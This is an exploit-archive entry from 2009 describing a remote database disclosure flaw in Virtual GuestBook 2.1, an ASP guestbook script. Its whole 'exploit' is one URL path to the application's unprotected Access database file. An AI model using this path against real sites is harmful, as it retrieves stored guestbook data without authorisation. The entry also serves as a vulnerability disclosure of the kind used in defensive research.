id: 4649
date: 01/13/2009
title: Virtual GuestBook 2.1 Remote Database Disclosure Vulnerability
author: Moudi
cves: 

==============================================================
Virtual GuestBook 2.1 Remote Database Disclosure Vulnerability
==============================================================


###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================

==============================================================================
    Virtual GuestBook v2.1 Remote Database Disclosure Vulnerability
==============================================================================

	[»] Script:             [ Virtual GuestBook v2.1  ]
	[»] Language:           [ ASP ]
	[»] Website:            [ http://www.minitdesign.com/vgbook.asp ]
        [»] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===	
	
	[»] http://localhost/[path]/database/guestbook.mdb


Author: Moudi

###########################################################################



#  0day.today [2023-03-26]  #